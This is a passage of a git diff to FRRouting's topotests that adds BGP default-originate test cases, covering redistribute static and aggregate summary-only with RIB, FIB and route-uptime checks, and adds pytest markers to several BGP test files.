+ "ipv6": {"unicast": {"redistribute": [{"redist_type": "static"}]}},
+ }
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, redistribute_static)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Verify 0.0.0.0/0 and 0::0/0 routes are also advertised from link-2; only the best path is installed in the FIB ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+    ), "Testcase {} : Failed\n Best path should be advertised in routes\n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Taking uptime snapshot before removing default originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove default-originate from link-1 from IPv4 and IPv6 neighbor ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot after removing default originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+    step("Verify the uptime; the uptime should get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring default originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ " Configure default-originate on link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot after configuring default originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("After configuring the default originate the uptime should not get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Taking uptime snapshot before removing redistribute static ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove redistribute static from IPv4 and IPv6 address family ")
+ input_dict_1 = {
+ "r1": {
+ "bgp": {
+ "local_as": get_dut_as_number(tgen, dut="r1"),
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "redistribute": [{"redist_type": "static", "delete": True}]
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "redistribute": [{"redist_type": "static", "delete": True}]
+ }
+ },
+ },
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_dict_1)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Taking uptime snapshot after removing redistribute static ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+    step("After removing redistribute static the route uptime should not get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ write_test_footer(tc_name)
+
+
+def test_verify_bgp_default_originate_with_aggregate_summary_p1(request):
+ """
+ Summary: "Verify default-originate route with aggregate summary command"
+ """
+ tgen = get_topogen()
+ global BGP_CONVERGENCE
+ tc_name = request.node.name
+ write_test_header(tc_name)
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+ reset_config_on_routers(tgen)
+ if BGP_CONVERGENCE != True:
+ pytest.skip("skipped because of BGP Convergence failure")
+
+    step("Verify the BGP convergence before starting the testcase")
+ BGP_CONVERGENCE = verify_bgp_convergence(tgen, topo)
+ assert BGP_CONVERGENCE is True, "setup_module :Failed \n Error: {}".format(
+ BGP_CONVERGENCE
+ )
+
+ step("Configure default-originate on R1 IPv4 and IPv6 BGP session link-1 only")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step(
+        "Verify IPv4/IPv6 default-originate routes are present on R2 with next-hop as link-1"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Advertise 5 IPv4 and IPv6 networks from R1 using the network command")
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {
+ "network": [NETWORK1_1[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_2[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_3[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_4[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ {
+ "network": [NETWORK1_5[addr_type]],
+ "next_hop": NEXT_HOP_IP[addr_type],
+ },
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Before configuring the aggregate route taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Configure aggregate summary command for IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
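+    # "summary-only" suppresses the more specific prefixes and advertises only
+    # the 0.0.0.0/0 and 0::0/0 aggregates towards the BGP peers.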
+ raw_config = {
+ "r1": {
+ "raw_config": [
+ "router bgp {}".format(local_as),
+ "address-family ipv4 unicast",
+                "aggregate-address {} summary-only".format("0.0.0.0/0"),
+ "exit-address-family",
+ "address-family ipv6 unicast",
+ "aggregate-address {} summary-only".format("0::0/0"),
+ "exit-address-family",
+ ]
+ }
+ }
+ result = apply_raw_config(tgen, raw_config)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step(
+        "Verify that there is no change to the IPv4/IPv6 default-originate route advertised from link-1, and that 0.0.0.0/0 and 0::0/0 are also advertised from link-2 on R2"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After configuring the aggregate route taking uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After configuring the aggregate route, uptime should get reset for the link-1 learned route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Before removing default originate taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+    step("Remove default originate from R1 link-1 IPv4 and IPv6 address family")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step(
+        "Verify that the IPv4/IPv6 default route is still advertised to R2 over link-1"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("After removing default-originate, taking uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After removing the default-originate, uptime should get reset for the link-1 learned route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Before configuring default-originate, taking uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure default-originate on R1 link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("After Configuring default originate taking uptime snapshot")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After configuring the default-originate, uptime should get reset for the link-1 learned route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Before removing the aggregate summary-only command, taking the uptime snapshot ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("remove aggregate summary command for IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ raw_config = {
+ "r1": {
+ "raw_config": [
+ "router bgp {}".format(local_as),
+ "address-family ipv4 unicast",
+ "no aggregate-address {} summary-only".format("0.0.0.0/0"),
+ "exit-address-family",
+ "address-family ipv6 unicast",
+ "no aggregate-address {} summary-only".format("0::0/0"),
+ "exit-address-family",
+ ]
+ }
+ }
+ result = apply_raw_config(tgen, raw_config)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify Default-originate IPv4/IPv6 route learn on link-1 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Verify 0.0.0.0/0 and 0::0/0 routes get removed from link-2 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert result is not True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("After removing the aggregate summary-only command, taking the uptime snapshot ")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("After removing aggregate command uptime should get reset ")
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ write_test_footer(tc_name)
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
index ee71ae16e0..814272374a 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_1.py
@@ -82,6 +82,8 @@ from lib.common_config import (
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
index a9987a8f96..8e6f930633 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_2.py
@@ -81,6 +81,8 @@ from lib.common_config import (
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
index 95511568c6..9e5250406b 100644
--- a/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_topo1_3.py
@@ -68,6 +68,7 @@ from lib.common_config import (
check_router_status,
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
@@ -1138,6 +1139,7 @@ def test_verify_default_originate_after_BGP_and_FRR_restart_p2(request):
write_test_footer(tc_name)
+
def test_verify_default_originate_after_shut_no_shut_bgp_neighbor_p1(request):
"""
Summary: "Verify default-originate route after shut/no shut and clear BGP neighbor "
@@ -2532,6 +2534,7 @@ def test_verify_default_originate_after_shut_no_shut_bgp_neighbor_p1(request):
write_test_footer(tc_name)
+
if __name__ == "__main__":
args = ["-s"] + sys.argv[1:]
sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py b/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
index d330a04439..fa5164fb71 100644
--- a/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
+++ b/tests/topotests/bgp_default_originate/test_default_orginate_vrf.py
@@ -73,6 +73,8 @@ from lib.common_config import (
delete_route_maps,
)
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Save the Current Working Directory to find configuration files.
CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
diff --git a/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py b/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
index 272a7fe291..9e3a3b5660 100644
--- a/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
+++ b/tests/topotests/bgp_default_originate/test_default_originate_conditional_routemap.py
@@ -74,6 +74,8 @@ CWD = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CWD, "../"))
sys.path.append(os.path.join(CWD, "../lib/"))
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Required to instantiate the topology builder class.
# pylint: disable=C0413
diff --git a/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf b/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
index 9e581a7be7..0a283c06d5 100644
--- a/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
+++ b/tests/topotests/bgp_default_route_route_map_match/r1/zebra.conf
@@ -5,7 +5,5 @@ interface lo
interface r1-eth0
ip address 192.168.255.1/24
!
-ip route 192.168.13.0./24 Null0
-!
ip forwarding
!
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
index 68436177d8..9f01287c91 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_ibgp_nbr.py
@@ -56,6 +56,9 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
index 1d424caa30..48f308e316 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_nbr.py
@@ -55,6 +55,8 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
index fc2d2364c6..4105c3fe63 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ebgp_unnumbered_nbr.py
@@ -52,6 +52,8 @@ from lib.bgp import create_router_bgp, verify_bgp_convergence, verify_bgp_rib
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
index 862cae42e9..a9e6d21b8d 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_nbr.py
@@ -58,9 +58,10 @@ from lib.bgp import (
)
from lib.topojson import build_config_from_json
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
+
# Global variables
topo = None
-
# Global variables
NETWORK = {
"ipv4": [
diff --git a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
index 1a91257f06..9a0fc44175 100644
--- a/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
+++ b/tests/topotests/bgp_ipv4_over_ipv6/test_rfc5549_ibgp_unnumbered_nbr.py
@@ -54,6 +54,7 @@ from lib.topojson import build_config_from_json
# Global variables
topo = None
+pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Global variables
NETWORK_CMD_IP = "1.0.1.17/32"
diff --git a/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py b/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
index d612ad2c94..bc53dfb469 100755
--- a/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
+++ b/tests/topotests/bgp_snmp_mplsl3vpn/test_bgp_snmp_mplsvpn.py
@@ -38,6 +38,7 @@ sys.path.append(os.path.join(CWD, "../"))
# Import topogen and topotest helpers
from lib.topogen import Topogen, TopoRouter, get_topogen
from lib.snmptest import SnmpTester
+from lib import topotest
# Required to instantiate the topology builder class.
@@ -239,10 +240,18 @@ def test_pe1_converge_evpn():
tgen = get_topogen()
r1 = tgen.gears["r1"]
- r1_snmp = SnmpTester(r1, "10.1.1.1", "public", "2c")
+ def _convergence():
